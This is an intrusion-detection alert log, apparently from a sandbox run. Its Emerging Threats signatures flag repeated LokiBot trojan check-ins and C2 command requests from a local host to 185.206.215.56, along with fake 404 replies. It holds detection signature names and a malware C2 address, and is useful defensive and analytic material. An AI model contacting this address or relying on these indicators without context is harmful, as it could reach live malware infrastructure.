                                                                                        01/05/21-19:06:23.862730TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.862730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.026554TCP2025483ET TROJAN LokiBot Fake 404 Response8049207185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:24.246261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.440570TCP2025483ET TROJAN LokiBot Fake 404 Response8049208185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:24.648294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.816571TCP2025483ET TROJAN LokiBot Fake 404 Response8049209185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:25.024326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.203072TCP2025483ET TROJAN LokiBot Fake 404 Response8049210185.206.215.56192.168.2.22
Timestamp                 Proto  SID      Message                                                Src Port  Dst Port  Src IP           Dst IP
01/05/21-19:06:25.428992  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49211     80        192.168.2.22     185.206.215.56
01/05/21-19:06:25.428992  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49211     80        192.168.2.22     185.206.215.56
01/05/21-19:06:25.428992  TCP    2025381  ET TROJAN LokiBot Checkin                              49211     80        192.168.2.22     185.206.215.56
01/05/21-19:06:25.428992  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49211     80        192.168.2.22     185.206.215.56
01/05/21-19:06:25.591475  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49211     185.206.215.56   192.168.2.22
01/05/21-19:06:25.813759  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49212     80        192.168.2.22     185.206.215.56
01/05/21-19:06:25.813759  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49212     80        192.168.2.22     185.206.215.56
01/05/21-19:06:25.813759  TCP    2025381  ET TROJAN LokiBot Checkin                              49212     80        192.168.2.22     185.206.215.56
01/05/21-19:06:25.813759  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49212     80        192.168.2.22     185.206.215.56
01/05/21-19:06:25.992160  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49212     185.206.215.56   192.168.2.22
01/05/21-19:06:26.197896  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49213     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.197896  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49213     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.197896  TCP    2025381  ET TROJAN LokiBot Checkin                              49213     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.197896  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49213     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.381041  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49213     185.206.215.56   192.168.2.22
01/05/21-19:06:26.599441  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49214     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.599441  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49214     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.599441  TCP    2025381  ET TROJAN LokiBot Checkin                              49214     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.599441  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49214     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.766199  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49214     185.206.215.56   192.168.2.22
01/05/21-19:06:26.971788  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49215     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.971788  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49215     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.971788  TCP    2025381  ET TROJAN LokiBot Checkin                              49215     80        192.168.2.22     185.206.215.56
01/05/21-19:06:26.971788  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49215     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.131364  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49215     185.206.215.56   192.168.2.22
01/05/21-19:06:27.359759  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49216     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.359759  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49216     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.359759  TCP    2025381  ET TROJAN LokiBot Checkin                              49216     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.359759  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49216     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.547159  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49216     185.206.215.56   192.168.2.22
01/05/21-19:06:27.753620  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49217     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.753620  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49217     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.753620  TCP    2025381  ET TROJAN LokiBot Checkin                              49217     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.753620  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49217     80        192.168.2.22     185.206.215.56
01/05/21-19:06:27.916227  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49217     185.206.215.56   192.168.2.22
01/05/21-19:06:28.127709  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49218     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.127709  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49218     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.127709  TCP    2025381  ET TROJAN LokiBot Checkin                              49218     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.127709  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49218     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.287151  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49218     185.206.215.56   192.168.2.22
01/05/21-19:06:28.505441  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49219     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.505441  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49219     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.505441  TCP    2025381  ET TROJAN LokiBot Checkin                              49219     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.505441  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49219     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.661950  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49219     185.206.215.56   192.168.2.22
01/05/21-19:06:28.880701  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49220     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.880701  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49220     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.880701  TCP    2025381  ET TROJAN LokiBot Checkin                              49220     80        192.168.2.22     185.206.215.56
01/05/21-19:06:28.880701  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49220     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.048592  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49220     185.206.215.56   192.168.2.22
01/05/21-19:06:29.244495  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49221     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.244495  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49221     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.244495  TCP    2025381  ET TROJAN LokiBot Checkin                              49221     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.244495  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49221     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.409620  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49221     185.206.215.56   192.168.2.22
01/05/21-19:06:29.630364  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49222     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.630364  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49222     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.630364  TCP    2025381  ET TROJAN LokiBot Checkin                              49222     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.630364  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49222     80        192.168.2.22     185.206.215.56
01/05/21-19:06:29.797474  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49222     185.206.215.56   192.168.2.22
01/05/21-19:06:30.014888  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49223     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.014888  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49223     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.014888  TCP    2025381  ET TROJAN LokiBot Checkin                              49223     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.014888  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49223     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.193197  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49223     185.206.215.56   192.168.2.22
01/05/21-19:06:30.409915  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49224     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.409915  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49224     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.409915  TCP    2025381  ET TROJAN LokiBot Checkin                              49224     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.409915  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49224     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.572043  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49224     185.206.215.56   192.168.2.22
01/05/21-19:06:30.786520  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49225     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.786520  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49225     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.786520  TCP    2025381  ET TROJAN LokiBot Checkin                              49225     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.786520  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49225     80        192.168.2.22     185.206.215.56
01/05/21-19:06:30.947633  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49225     185.206.215.56   192.168.2.22
01/05/21-19:06:31.159641  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49226     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.159641  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49226     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.159641  TCP    2025381  ET TROJAN LokiBot Checkin                              49226     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.159641  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49226     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.319802  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49226     185.206.215.56   192.168.2.22
01/05/21-19:06:31.542986  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49227     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.542986  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49227     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.542986  TCP    2025381  ET TROJAN LokiBot Checkin                              49227     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.542986  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49227     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.697483  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49227     185.206.215.56   192.168.2.22
01/05/21-19:06:31.903232  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49228     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.903232  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49228     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.903232  TCP    2025381  ET TROJAN LokiBot Checkin                              49228     80        192.168.2.22     185.206.215.56
01/05/21-19:06:31.903232  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49228     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.053069  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49228     185.206.215.56   192.168.2.22
01/05/21-19:06:32.262786  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49229     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.262786  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49229     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.262786  TCP    2025381  ET TROJAN LokiBot Checkin                              49229     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.262786  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49229     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.426688  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49229     185.206.215.56   192.168.2.22
01/05/21-19:06:32.647726  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49230     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.647726  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49230     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.647726  TCP    2025381  ET TROJAN LokiBot Checkin                              49230     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.647726  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49230     80        192.168.2.22     185.206.215.56
01/05/21-19:06:32.815517  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49230     185.206.215.56   192.168.2.22
01/05/21-19:06:33.031393  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49231     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.031393  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49231     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.031393  TCP    2025381  ET TROJAN LokiBot Checkin                              49231     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.031393  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49231     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.190810  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49231     185.206.215.56   192.168.2.22
01/05/21-19:06:33.398944  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49232     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.398944  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49232     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.398944  TCP    2025381  ET TROJAN LokiBot Checkin                              49232     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.398944  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49232     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.560619  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49232     185.206.215.56   192.168.2.22
01/05/21-19:06:33.770156  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49233     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.770156  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49233     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.770156  TCP    2025381  ET TROJAN LokiBot Checkin                              49233     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.770156  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49233     80        192.168.2.22     185.206.215.56
01/05/21-19:06:33.939742  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49233     185.206.215.56   192.168.2.22
01/05/21-19:06:34.165366  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49234     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.165366  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49234     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.165366  TCP    2025381  ET TROJAN LokiBot Checkin                              49234     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.165366  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49234     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.334828  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49234     185.206.215.56   192.168.2.22
01/05/21-19:06:34.564013  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49235     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.564013  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49235     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.564013  TCP    2025381  ET TROJAN LokiBot Checkin                              49235     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.564013  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49235     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.721364  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49235     185.206.215.56   192.168.2.22
01/05/21-19:06:34.935155  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49236     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.935155  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49236     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.935155  TCP    2025381  ET TROJAN LokiBot Checkin                              49236     80        192.168.2.22     185.206.215.56
01/05/21-19:06:34.935155  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49236     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.122327  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49236     185.206.215.56   192.168.2.22
01/05/21-19:06:35.342016  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49237     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.342016  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49237     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.342016  TCP    2025381  ET TROJAN LokiBot Checkin                              49237     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.342016  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49237     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.512183  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49237     185.206.215.56   192.168.2.22
01/05/21-19:06:35.726449  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49238     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.726449  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49238     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.726449  TCP    2025381  ET TROJAN LokiBot Checkin                              49238     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.726449  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49238     80        192.168.2.22     185.206.215.56
01/05/21-19:06:35.894052  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49238     185.206.215.56   192.168.2.22
01/05/21-19:06:36.098105  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49239     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.098105  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49239     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.098105  TCP    2025381  ET TROJAN LokiBot Checkin                              49239     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.098105  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49239     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.277202  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49239     185.206.215.56   192.168.2.22
01/05/21-19:06:36.491085  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49240     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.491085  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49240     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.491085  TCP    2025381  ET TROJAN LokiBot Checkin                              49240     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.491085  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49240     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.657367  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49240     185.206.215.56   192.168.2.22
01/05/21-19:06:36.879808  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49241     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.879808  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49241     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.879808  TCP    2025381  ET TROJAN LokiBot Checkin                              49241     80        192.168.2.22     185.206.215.56
01/05/21-19:06:36.879808  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49241     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.043514  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49241     185.206.215.56   192.168.2.22
01/05/21-19:06:37.256017  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49242     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.256017  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49242     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.256017  TCP    2025381  ET TROJAN LokiBot Checkin                              49242     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.256017  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49242     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.425204  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49242     185.206.215.56   192.168.2.22
01/05/21-19:06:37.635343  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49243     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.635343  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49243     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.635343  TCP    2025381  ET TROJAN LokiBot Checkin                              49243     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.635343  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49243     80        192.168.2.22     185.206.215.56
01/05/21-19:06:37.804227  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49243     185.206.215.56   192.168.2.22
01/05/21-19:06:38.018241  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49244     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.018241  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49244     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.018241  TCP    2025381  ET TROJAN LokiBot Checkin                              49244     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.018241  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49244     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.186781  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49244     185.206.215.56   192.168.2.22
01/05/21-19:06:38.389239  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49245     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.389239  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49245     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.389239  TCP    2025381  ET TROJAN LokiBot Checkin                              49245     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.389239  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49245     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.563167  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49245     185.206.215.56   192.168.2.22
01/05/21-19:06:38.784644  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49246     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.784644  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49246     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.784644  TCP    2025381  ET TROJAN LokiBot Checkin                              49246     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.784644  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49246     80        192.168.2.22     185.206.215.56
01/05/21-19:06:38.965108  TCP    2025483  ET TROJAN LokiBot Fake 404 Response                    80        49246     185.206.215.56   192.168.2.22
01/05/21-19:06:39.177876  TCP    2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1  49247     80        192.168.2.22     185.206.215.56
01/05/21-19:06:39.177876  TCP    2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)          49247     80        192.168.2.22     185.206.215.56
01/05/21-19:06:39.177876  TCP    2025381  ET TROJAN LokiBot Checkin                              49247     80        192.168.2.22     185.206.215.56
01/05/21-19:06:39.177876  TCP    2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2  49247     80        192.168.2.22     185.206.215.56
                                                                                        01/05/21-19:06:39.331864TCP2025483ET TROJAN LokiBot Fake 404 Response8049247185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:39.554968TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2025381ET TROJAN LokiBot Checkin4924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.738314TCP2025483ET TROJAN LokiBot Fake 404 Response8049248185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:39.944185TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2025381ET TROJAN LokiBot Checkin4924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.121556TCP2025483ET TROJAN LokiBot Fake 404 Response8049249185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:40.335810TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2025381ET TROJAN LokiBot Checkin4925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.507894TCP2025483ET TROJAN LokiBot Fake 404 Response8049250185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:40.714092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925180192.168.2.22185.206.215.56
